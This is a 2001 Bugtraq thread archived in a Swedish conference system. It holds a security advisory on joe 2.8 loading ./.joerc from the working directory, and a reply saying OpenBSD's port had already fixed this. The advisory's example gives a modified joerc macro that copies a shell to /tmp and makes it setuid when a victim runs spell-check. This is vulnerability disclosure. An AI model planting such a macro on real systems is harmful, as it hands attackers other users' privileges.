6152496 2001-02-28 15:13 +0100  /74 rader/  <advisories@WKIT.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-28  18:30  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: advisories@WKIT.COM
Mottagare: Bugtraq (import) <15685>
Ärende: Joe's Own Editor File Handling Error
------------------------------------------------------------
From: advisories@WKIT.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <OF61B9B540.D6BC1630-ONC1256A01.004D1564@wkit.se>

WKIT SECURITY AB
 www.wkit.com


TITLE:          Joe's Own Editor File Handling Error
ADVISORY ID:    WSIR-01/02-02
REFERENCE:      http://www.wkit.com/advisories
CVE:            GENERIC-MAP-NOMATCH
CREDIT:         Christer Öberg, Wkit Security AB
CONTACT:        advisories@wkit.com
CLASS:          File Handling Error
OBJECT:         joe(1) (exec)
VENDOR:         Josef H. Allen
STATUS:
REMOTE:         No
LOCAL:          Yes
VULNERABLE:     Joseph Allen joe 2.8

DATE
  CREATED:        26/02/2001
  LAST UPDATED:
  VENDOR CONTACT:
  RELEASE:        28/02/2001

VULNERABILITY DESCRIPTION
  joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
  /usr/local/lib/joerc in that order. Users could be tricked into execute
  commands if they open/edit a file with joe in a directory where other
  users can write.

CONDITIONS
  User using joe in a world/group writable directory.

EXAMPLE
  A user copy the default joerc file to a world writable directory and
change
  :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
  >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
  to
  :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
  >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod
  4755 /tmp/suid",rtn,retype
  Another user opens a file in that directory with joe and run ispell with
  ^[l the result is a suid shell in /tmp

SOLUTION/VENDOR INFORMATION/WORKAROUND

DISCLAIMER
  The contents of this advisory may be distributed freely, provided that
  no fee is charged and proper credit is given. Wkit Security AB takes
  no credit for this discovery if someone else has published this
  information in the public domain before this advisory was released.
  The information herein is intended for educational purposes, not for
  malicious use. Wkit Security AB takes no responsibility whatsoever for
the
  use of this information.

ABOUT
  Wkit Security AB is an independent data security company working with
  security-related services and products.

  Wkit Security AB
  Upperudsv. 4
  S-464 72 Håverud
  SWEDEN
  http://www.wkit.com
  e-mail: advisories@wkit.com

(C) 2001 WKIT SECURITY AB
(6152496) ------------------------------------------
Kommentar i text 6153779 av Brad <brad@COMSTYLE.COM>
6153779 2001-02-28 14:25 -0500  /46 rader/ Brad <brad@COMSTYLE.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-28  23:48  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: brad@COMSTYLE.COM
Mottagare: Bugtraq (import) <15691>
Kommentar till text 6152496 av  <advisories@WKIT.COM>
Ärende: Re: Joe's Own Editor File Handling Error
------------------------------------------------------------
From: Brad <brad@COMSTYLE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSO.4.33.0102281412380.1599-100000@ss5.comstyle.com>

After looking through the patches that OpenBSD/FreeBSD/NetBSD has for
their joe ports, it looks like joe is still vulnerable in the
FreeBSD/NetBSD ports trees, but not in the OpenBSD ports tree as of
Dec 22 1998.

revision 1.3 date: 1998/12/22 03:58:13;  author: form;  state: Exp;
lines: +74 -55 Do not use ./.xxxrc startup file.  Startup files
order: ~/.xxxrc, /etc/joe/xxxrc, ${PREFIX}/lib/joe/xxxrc.

// Brad

brad@comstyle.com
brad@openbsd.org

>TITLE:          Joe's Own Editor File Handling Error
>ADVISORY ID:    WSIR-01/02-02
>REFERENCE:      http://www.wkit.com/advisories
>CVE:            GENERIC-MAP-NOMATCH
>CREDIT:         Christer Öberg, Wkit Security AB
>CONTACT:        advisories@wkit.com
>CLASS:          File Handling Error
>OBJECT:         joe(1) (exec)
>VENDOR:         Josef H. Allen
>STATUS:
>REMOTE:         No
>LOCAL:          Yes
>VULNERABLE:     Joseph Allen joe 2.8
>
>DATE
>  CREATED:        26/02/2001
>  LAST UPDATED:
>  VENDOR CONTACT:
>  RELEASE:        28/02/2001
>
>VULNERABILITY DESCRIPTION
>  joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
>  /usr/local/lib/joerc in that order. Users could be tricked into execute
>  commands if they open/edit a file with joe in a directory where other
>  users can write.
(6153779) --------------------------------(Ombruten)